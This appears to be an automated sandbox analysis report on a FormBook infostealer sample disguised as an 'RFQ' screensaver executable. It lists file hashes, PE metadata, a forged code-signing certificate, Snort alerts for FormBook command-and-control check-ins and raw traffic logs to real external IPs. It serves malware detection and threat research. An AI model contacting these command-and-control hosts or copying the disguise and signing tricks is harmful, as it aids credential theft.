                            ONEANDONE-ASBrauerstrasse48DEG7DzDN2VcB.exeGet hashmaliciousFormBookBrowse
                            • 213.171.195.105
                            file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 217.160.0.46
                            4333.exeGet hashmaliciousDBatLoader, FormBookBrowse
                            • 217.160.0.145
                            TS-240514-UF2.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 213.171.195.105
                            emsO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 217.160.0.46
                            098754345678.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 217.160.0.145
                            https://codepen.io/jillianr-accountant-com/full/ZENYVKwGet hashmaliciousUnknownBrowse
                            • 217.160.86.75
                            22wonl2YIZeR0zX.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 217.160.0.46
                            67gneXXY2P.elfGet hashmaliciousUnknownBrowse
                            • 82.165.223.247
                            O6sZ2JI6S5.elfGet hashmaliciousUnknownBrowse
                            • 74.208.53.190

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ-25251.scr.exe.log

                            Download File
                            Process:C:\Users\user\Desktop\RFQ-25251.scr.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1216
                            Entropy (8bit):5.34331486778365
                            Encrypted:false
                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                            C:\Users\user\AppData\Local\Temp\C3vB7APK

                            Download File
                            Process:C:\Windows\SysWOW64\replace.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                            Category:dropped
                            Size (bytes):196608
                            Entropy (8bit):1.1211596417522893
                            Encrypted:false
                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                            MD5:0AB67F0950F46216D5590A6A41A267C7
                            SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                            SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                            SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):7.959210820182498
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                            • Win32 Executable (generic) a (10002005/4) 49.93%
                            • Windows Screen Saver (13104/52) 0.07%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            • DOS Executable Generic (2002/1) 0.01%
                            File name:RFQ-25251.scr.exe
                            File size:783'880 bytes
                            MD5:46c4b29ec6111cebfa1bbd60074c3103
                            SHA1:fb6d55a4b03b0a0be4fa8ec340e1ddfb2e9d813d
                            SHA256:752b21ce0ebfdc831bc7348db4fdc8a8e15bd67ffb1ed3b60332513a35bb27aa
                            SHA512:43d6c22800610e48df9c6f03f0a91f2f9f155d707c88509c404ad5619e2be5793fa98f2362c531cdfe655e7c1ddc0d010f067c812d8fff6f9b746e45c3dc30ec
                            SSDEEP:12288:wReLAfP7wDbLjy+1ayaK4vnirspoK/PmaBnYakJcZg3zPSIfF7We43V+k4o+EsJa:C537wDv++UyN4PiruoOrfkJcZgD37T4Z
                            TLSH:3DF423A0B55C1C0BCF69ADF8B4E1605343F324014AA8FDA6B6E2359F08E5F55836DA4F
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^<f..............0..r...L......V.... ........@.. ....................... ............@................................

                            File Icon

                            Icon Hash:2323232323234d0d

                            Static PE Info

                            General

                            Entrypoint:0x4b9056
                            Entrypoint Section:.text
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x663C5E01 [Thu May 9 05:24:17 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                            Authenticode Signature

                            Signature Valid:false
                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                            Signature Validation Error:The digital signature of the object did not verify
                            Error Number:-2146869232
                            Not Before, Not After
                            • 13/11/2018 01:00:00 09/11/2021 00:59:59
                            Subject Chain
                            • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                            Version:3
                            Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                            Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                            Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                            Serial:7C1118CBBADC95DA3752C46E47A27438

                            Entrypoint Preview

                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb90040x4f.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xba0000x494c.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0xbc0000x3608
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0xb7ca80x54.text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000xb705c0xb7200cd82038afe55caa7dc8fb7a0ccf9275eFalse0.9792155503412969data7.982871137085219IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0xba0000x494c0x4a00c1440e7abce92a197f48d007e37d4c76False0.18216849662162163data4.8118498547244295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xc00000xc0x20082769f8f7c005bedfa33fe36fab77a38False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xba1a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.2526595744680851
                            RT_ICON0xba6100x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2834 x 2834 px/m0.21147540983606558
                            RT_ICON0xbaf980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.1700281425891182
                            RT_ICON0xbc0400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.16016597510373445
                            RT_GROUP_ICON0xbe5e80x3edata0.7903225806451613
                            RT_GROUP_ICON0xbe6280x14data1.05
                            RT_VERSION0xbe63c0x310data0.47066326530612246

                            Imports

                            DLLImport
                            mscoree.dll_CorExeMain

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            05/14/24-12:53:04.780850TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974380192.168.2.10162.240.81.18
                            05/14/24-12:51:31.633445TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972380192.168.2.1064.190.62.22
                            05/14/24-12:52:41.548527TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973980192.168.2.10203.161.46.103
                            05/14/24-12:53:20.139090TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974780192.168.2.10103.93.125.69
                            05/14/24-12:51:47.573829TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972780192.168.2.10217.76.128.34
                            05/14/24-12:54:08.648319TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975580192.168.2.1091.195.240.19
                            05/14/24-12:50:58.665024TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971880192.168.2.1079.98.25.1
                            05/14/24-12:53:44.973245TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975180192.168.2.103.125.172.46
                            05/14/24-12:52:18.192090TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973580192.168.2.10178.211.137.59

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            May 14, 2024 12:50:58.333395004 CEST4971880192.168.2.1079.98.25.1
                            May 14, 2024 12:50:58.662271023 CEST804971879.98.25.1192.168.2.10
                            May 14, 2024 12:50:58.662425995 CEST4971880192.168.2.1079.98.25.1
                            May 14, 2024 12:50:58.665024042 CEST4971880192.168.2.1079.98.25.1
                            May 14, 2024 12:50:58.993669987 CEST804971879.98.25.1192.168.2.10
                            May 14, 2024 12:50:58.995083094 CEST804971879.98.25.1192.168.2.10
                            May 14, 2024 12:50:58.995106936 CEST804971879.98.25.1192.168.2.10
                            May 14, 2024 12:50:58.995121002 CEST804971879.98.25.1192.168.2.10
                            May 14, 2024 12:50:58.995136023 CEST804971879.98.25.1192.168.2.10
                            May 14, 2024 12:50:58.995156050 CEST804971879.98.25.1192.168.2.10
                            May 14, 2024 12:50:58.995168924 CEST804971879.98.25.1192.168.2.10
                            May 14, 2024 12:50:58.995202065 CEST4971880192.168.2.1079.98.25.1
                            May 14, 2024 12:50:58.995296955 CEST4971880192.168.2.1079.98.25.1
                            May 14, 2024 12:50:58.998395920 CEST4971880192.168.2.1079.98.25.1
                            May 14, 2024 12:50:59.326989889 CEST804971879.98.25.1192.168.2.10
                            May 14, 2024 12:51:22.665867090 CEST4972080192.168.2.1064.190.62.22
                            May 14, 2024 12:51:22.971122980 CEST804972064.190.62.22192.168.2.10
                            May 14, 2024 12:51:22.971322060 CEST4972080192.168.2.1064.190.62.22
                            May 14, 2024 12:51:23.089873075 CEST4972080192.168.2.1064.190.62.22
                            May 14, 2024 12:51:23.395986080 CEST804972064.190.62.22192.168.2.10
                            May 14, 2024 12:51:23.396023035 CEST804972064.190.62.22192.168.2.10
                            May 14, 2024 12:51:23.396112919 CEST4972080192.168.2.1064.190.62.22
                            May 14, 2024 12:51:24.627492905 CEST4972080192.168.2.1064.190.62.22
                            May 14, 2024 12:51:25.635724068 CEST4972180192.168.2.1064.190.62.22
                            May 14, 2024 12:51:25.946522951 CEST804972164.190.62.22192.168.2.10
                            May 14, 2024 12:51:25.946675062 CEST4972180192.168.2.1064.190.62.22
                            May 14, 2024 12:51:25.948530912 CEST4972180192.168.2.1064.190.62.22
                            May 14, 2024 12:51:26.259799004 CEST804972164.190.62.22192.168.2.10
                            May 14, 2024 12:51:26.259824038 CEST804972164.190.62.22192.168.2.10
                            May 14, 2024 12:51:26.259902954 CEST4972180192.168.2.1064.190.62.22
                            May 14, 2024 12:51:27.460469007 CEST4972180192.168.2.1064.190.62.22
                            May 14, 2024 12:51:28.484834909 CEST4972280192.168.2.1064.190.62.22
                            May 14, 2024 12:51:28.794408083 CEST804972264.190.62.22192.168.2.10
                            May 14, 2024 12:51:28.796075106 CEST4972280192.168.2.1064.190.62.22
                            May 14, 2024 12:51:28.800075054 CEST4972280192.168.2.1064.190.62.22
                            May 14, 2024 12:51:29.109586954 CEST804972264.190.62.22192.168.2.10
                            May 14, 2024 12:51:29.110132933 CEST804972264.190.62.22192.168.2.10
                            May 14, 2024 12:51:29.110152006 CEST804972264.190.62.22192.168.2.10
                            May 14, 2024 12:51:29.110291958 CEST4972280192.168.2.1064.190.62.22
                            May 14, 2024 12:51:30.304352999 CEST4972280192.168.2.1064.190.62.22
                            May 14, 2024 12:51:31.323152065 CEST4972380192.168.2.1064.190.62.22
                            May 14, 2024 12:51:31.631155968 CEST804972364.190.62.22192.168.2.10
                            May 14, 2024 12:51:31.631311893 CEST4972380192.168.2.1064.190.62.22
                            May 14, 2024 12:51:31.633445024 CEST4972380192.168.2.1064.190.62.22
                            May 14, 2024 12:51:31.942078114 CEST804972364.190.62.22192.168.2.10
                            May 14, 2024 12:51:31.942111015 CEST804972364.190.62.22192.168.2.10
                            May 14, 2024 12:51:31.942310095 CEST4972380192.168.2.1064.190.62.22
                            May 14, 2024 12:51:31.944737911 CEST4972380192.168.2.1064.190.62.22
                            May 14, 2024 12:51:32.252641916 CEST804972364.190.62.22192.168.2.10
                            May 14, 2024 12:51:37.801681995 CEST4972480192.168.2.10217.76.128.34
                            May 14, 2024 12:51:38.133577108 CEST8049724217.76.128.34192.168.2.10
                            May 14, 2024 12:51:38.133783102 CEST4972480192.168.2.10217.76.128.34
                            May 14, 2024 12:51:38.135797024 CEST4972480192.168.2.10217.76.128.34
                            May 14, 2024 12:51:38.467822075 CEST8049724217.76.128.34192.168.2.10
                            May 14, 2024 12:51:38.473130941 CEST8049724217.76.128.34192.168.2.10
                            May 14, 2024 12:51:38.473154068 CEST8049724217.76.128.34192.168.2.10
                            May 14, 2024 12:51:38.473201990 CEST8049724217.76.128.34192.168.2.10
                            May 14, 2024 12:51:38.473249912 CEST8049724217.76.128.34192.168.2.10
                            May 14, 2024 12:51:38.473305941 CEST8049724217.76.128.34192.168.2.10
                            May 14, 2024 12:51:38.473316908 CEST4972480192.168.2.10217.76.128.34
                            May 14, 2024 12:51:38.473352909 CEST4972480192.168.2.10217.76.128.34
                            May 14, 2024 12:51:38.473546028 CEST8049724217.76.128.34192.168.2.10
                            May 14, 2024 12:51:38.473560095 CEST8049724217.76.128.34192.168.2.10
                            May 14, 2024 12:51:38.473575115 CEST8049724217.76.128.34192.168.2.10
                            May 14, 2024 12:51:38.473594904 CEST8049724217.76.128.34192.168.2.10
                            May 14, 2024 12:51:38.473596096 CEST4972480192.168.2.10217.76.128.34
                            May 14, 2024 12:51:38.473618984 CEST4972480192.168.2.10217.76.128.34
                            May 14, 2024 12:51:38.473643064 CEST4972480192.168.2.10217.76.128.34
                            May 14, 2024 12:51:39.648021936 CEST4972480192.168.2.10217.76.128.34
                            May 14, 2024 12:51:40.776884079 CEST4972580192.168.2.10217.76.128.34
                            May 14, 2024 12:51:41.109312057 CEST8049725217.76.128.34192.168.2.10
                            May 14, 2024 12:51:41.109468937 CEST4972580192.168.2.10217.76.128.34
                            May 14, 2024 12:51:41.860852003 CEST4972580192.168.2.10217.76.128.34
                            May 14, 2024 12:51:42.192886114 CEST8049725217.76.128.34192.168.2.10
                            May 14, 2024 12:51:42.209083080 CEST8049725217.76.128.34192.168.2.10
                            May 14, 2024 12:51:42.209124088 CEST8049725217.76.128.34192.168.2.10
                            May 14, 2024 12:51:42.209139109 CEST8049725217.76.128.34192.168.2.10
                            May 14, 2024 12:51:42.209156036 CEST8049725217.76.128.34192.168.2.10
                            May 14, 2024 12:51:42.209173918 CEST8049725217.76.128.34192.168.2.10
                            May 14, 2024 12:51:42.209172964 CEST4972580192.168.2.10217.76.128.34
                            May 14, 2024 12:51:42.209189892 CEST8049725217.76.128.34192.168.2.10
                            May 14, 2024 12:51:42.209199905 CEST4972580192.168.2.10217.76.128.34
                            May 14, 2024 12:51:42.209207058 CEST8049725217.76.128.34192.168.2.10
                            May 14, 2024 12:51:42.209223032 CEST8049725217.76.128.34192.168.2.10
                            May 14, 2024 12:51:42.209224939 CEST4972580192.168.2.10217.76.128.34
                            May 14, 2024 12:51:42.209263086 CEST4972580192.168.2.10217.76.128.34
                            May 14, 2024 12:51:43.366862059 CEST4972580192.168.2.10217.76.128.34
                            May 14, 2024 12:51:44.385067940 CEST4972680192.168.2.10217.76.128.34
                            May 14, 2024 12:51:44.713088989 CEST8049726217.76.128.34192.168.2.10
                            May 14, 2024 12:51:44.713262081 CEST4972680192.168.2.10217.76.128.34
                            May 14, 2024 12:51:44.715322971 CEST4972680192.168.2.10217.76.128.34
                            May 14, 2024 12:51:45.043494940 CEST8049726217.76.128.34192.168.2.10
                            May 14, 2024 12:51:45.043524981 CEST8049726217.76.128.34192.168.2.10
                            May 14, 2024 12:51:45.046716928 CEST8049726217.76.128.34192.168.2.10
                            May 14, 2024 12:51:45.046735048 CEST8049726217.76.128.34192.168.2.10
                            May 14, 2024 12:51:45.046781063 CEST8049726217.76.128.34192.168.2.10
                            May 14, 2024 12:51:45.046794891 CEST8049726217.76.128.34192.168.2.10
                            May 14, 2024 12:51:45.046808004 CEST8049726217.76.128.34192.168.2.10
                            May 14, 2024 12:51:45.046822071 CEST8049726217.76.128.34192.168.2.10
                            May 14, 2024 12:51:45.046825886 CEST4972680192.168.2.10217.76.128.34
                            May 14, 2024 12:51:45.046834946 CEST8049726217.76.128.34192.168.2.10
                            May 14, 2024 12:51:45.046849966 CEST8049726217.76.128.34192.168.2.10
                            May 14, 2024 12:51:45.046883106 CEST4972680192.168.2.10217.76.128.34
                            May 14, 2024 12:51:45.046883106 CEST4972680192.168.2.10217.76.128.34
                            May 14, 2024 12:51:45.046883106 CEST4972680192.168.2.10217.76.128.34
                            May 14, 2024 12:51:46.226201057 CEST4972680192.168.2.10217.76.128.34
                            May 14, 2024 12:51:47.245409966 CEST4972780192.168.2.10217.76.128.34
                            May 14, 2024 12:51:47.571624994 CEST8049727217.76.128.34192.168.2.10
                            May 14, 2024 12:51:47.571845055 CEST4972780192.168.2.10217.76.128.34
                            May 14, 2024 12:51:47.573828936 CEST4972780192.168.2.10217.76.128.34
                            May 14, 2024 12:51:47.900136948 CEST8049727217.76.128.34192.168.2.10
                            May 14, 2024 12:51:47.904377937 CEST8049727217.76.128.34192.168.2.10
                            May 14, 2024 12:51:47.904444933 CEST8049727217.76.128.34192.168.2.10
                            May 14, 2024 12:51:47.904495001 CEST8049727217.76.128.34192.168.2.10
                            May 14, 2024 12:51:47.904532909 CEST4972780192.168.2.10217.76.128.34
                            May 14, 2024 12:51:47.904623985 CEST8049727217.76.128.34192.168.2.10
                            May 14, 2024 12:51:47.904643059 CEST8049727217.76.128.34192.168.2.10
                            May 14, 2024 12:51:47.904656887 CEST8049727217.76.128.34192.168.2.10
                            May 14, 2024 12:51:47.904670954 CEST8049727217.76.128.34192.168.2.10
                            May 14, 2024 12:51:47.904685020 CEST8049727217.76.128.34192.168.2.10
                            May 14, 2024 12:51:47.904697895 CEST8049727217.76.128.34192.168.2.10
                            May 14, 2024 12:51:47.904759884 CEST4972780192.168.2.10217.76.128.34
                            May 14, 2024 12:51:47.904759884 CEST4972780192.168.2.10217.76.128.34
                            May 14, 2024 12:51:47.904794931 CEST4972780192.168.2.10217.76.128.34
                            May 14, 2024 12:51:47.904825926 CEST4972780192.168.2.10217.76.128.34
                            May 14, 2024 12:51:47.909784079 CEST4972780192.168.2.10217.76.128.34
                            May 14, 2024 12:51:48.235899925 CEST8049727217.76.128.34192.168.2.10
                            May 14, 2024 12:51:53.417862892 CEST4972880192.168.2.1052.175.38.24
                            May 14, 2024 12:51:53.731693983 CEST804972852.175.38.24192.168.2.10
                            May 14, 2024 12:51:53.731807947 CEST4972880192.168.2.1052.175.38.24
                            May 14, 2024 12:51:54.044508934 CEST804972852.175.38.24192.168.2.10
                            May 14, 2024 12:51:54.044534922 CEST804972852.175.38.24192.168.2.10
                            May 14, 2024 12:51:54.044553041 CEST804972852.175.38.24192.168.2.10
                            May 14, 2024 12:51:54.044660091 CEST4972880192.168.2.1052.175.38.24
                            May 14, 2024 12:51:55.246023893 CEST4972880192.168.2.1052.175.38.24
                            May 14, 2024 12:51:56.262738943 CEST4972980192.168.2.1052.175.38.24
                            May 14, 2024 12:51:56.572851896 CEST804972952.175.38.24192.168.2.10
                            May 14, 2024 12:51:56.573018074 CEST4972980192.168.2.1052.175.38.24
                            May 14, 2024 12:51:56.881869078 CEST804972952.175.38.24192.168.2.10
                            May 14, 2024 12:51:56.881896019 CEST804972952.175.38.24192.168.2.10
                            May 14, 2024 12:51:56.881911039 CEST804972952.175.38.24192.168.2.10
                            May 14, 2024 12:51:56.882005930 CEST4972980192.168.2.1052.175.38.24
                            May 14, 2024 12:51:58.085527897 CEST4972980192.168.2.1052.175.38.24
                            May 14, 2024 12:51:59.104523897 CEST4973080192.168.2.1052.175.38.24
                            May 14, 2024 12:51:59.413424969 CEST804973052.175.38.24192.168.2.10
                            May 14, 2024 12:51:59.413542032 CEST4973080192.168.2.1052.175.38.24
                            May 14, 2024 12:51:59.722137928 CEST804973052.175.38.24192.168.2.10
                            May 14, 2024 12:51:59.722168922 CEST804973052.175.38.24192.168.2.10
                            May 14, 2024 12:51:59.722192049 CEST804973052.175.38.24192.168.2.10
                            May 14, 2024 12:51:59.722318888 CEST4973080192.168.2.1052.175.38.24
                            May 14, 2024 12:52:00.929243088 CEST4973080192.168.2.1052.175.38.24
                            May 14, 2024 12:52:01.948913097 CEST4973180192.168.2.1052.175.38.24
                            May 14, 2024 12:52:02.259890079 CEST804973152.175.38.24192.168.2.10
                            May 14, 2024 12:52:02.264336109 CEST4973180192.168.2.1052.175.38.24
                            May 14, 2024 12:52:02.574865103 CEST804973152.175.38.24192.168.2.10
                            May 14, 2024 12:52:02.574887991 CEST804973152.175.38.24192.168.2.10
                            May 14, 2024 12:52:02.575057030 CEST804973152.175.38.24192.168.2.10
                            May 14, 2024 12:52:02.575146914 CEST4973180192.168.2.1052.175.38.24
                            May 14, 2024 12:52:02.575242043 CEST4973180192.168.2.1052.175.38.24
                            May 14, 2024 12:52:08.102864981 CEST4973280192.168.2.10178.211.137.59
                            May 14, 2024 12:52:08.428065062 CEST8049732178.211.137.59192.168.2.10
                            May 14, 2024 12:52:08.432652950 CEST4973280192.168.2.10178.211.137.59
                            May 14, 2024 12:52:08.434066057 CEST4973280192.168.2.10178.211.137.59
                            May 14, 2024 12:52:08.759188890 CEST8049732178.211.137.59192.168.2.10
                            May 14, 2024 12:52:08.760406971 CEST8049732178.211.137.59192.168.2.10
                            May 14, 2024 12:52:08.760445118 CEST8049732178.211.137.59192.168.2.10
                            May 14, 2024 12:52:08.760498047 CEST4973280192.168.2.10178.211.137.59
                            May 14, 2024 12:52:09.944785118 CEST4973280192.168.2.10178.211.137.59
                            May 14, 2024 12:52:09.976089001 CEST4973180192.168.2.1052.175.38.24
                            May 14, 2024 12:52:10.286418915 CEST804973152.175.38.24192.168.2.10
                            May 14, 2024 12:52:10.964270115 CEST4973380192.168.2.10178.211.137.59
                            May 14, 2024 12:52:11.290399075 CEST8049733178.211.137.59192.168.2.10
                            May 14, 2024 12:52:11.290477991 CEST4973380192.168.2.10178.211.137.59
                            May 14, 2024 12:52:11.292457104 CEST4973380192.168.2.10178.211.137.59
                            May 14, 2024 12:52:11.618407011 CEST8049733178.211.137.59192.168.2.10
                            May 14, 2024 12:52:11.619638920 CEST8049733178.211.137.59192.168.2.10
                            May 14, 2024 12:52:11.619698048 CEST8049733178.211.137.59192.168.2.10
                            May 14, 2024 12:52:11.619750977 CEST4973380192.168.2.10178.211.137.59
                            May 14, 2024 12:52:12.825925112 CEST4973380192.168.2.10178.211.137.59
                            May 14, 2024 12:52:14.935132027 CEST4973480192.168.2.10178.211.137.59
                            May 14, 2024 12:52:15.260688066 CEST8049734178.211.137.59192.168.2.10
                            May 14, 2024 12:52:15.260842085 CEST4973480192.168.2.10178.211.137.59
                            May 14, 2024 12:52:15.328545094 CEST4973480192.168.2.10178.211.137.59
                            May 14, 2024 12:52:15.654220104 CEST8049734178.211.137.59192.168.2.10
                            May 14, 2024 12:52:15.654952049 CEST8049734178.211.137.59192.168.2.10
                            May 14, 2024 12:52:15.654973984 CEST8049734178.211.137.59192.168.2.10
                            May 14, 2024 12:52:15.655025959 CEST4973480192.168.2.10178.211.137.59
                            May 14, 2024 12:52:16.837018967 CEST4973480192.168.2.10178.211.137.59
                            May 14, 2024 12:52:17.854393005 CEST4973580192.168.2.10178.211.137.59
                            May 14, 2024 12:52:18.189089060 CEST8049735178.211.137.59192.168.2.10
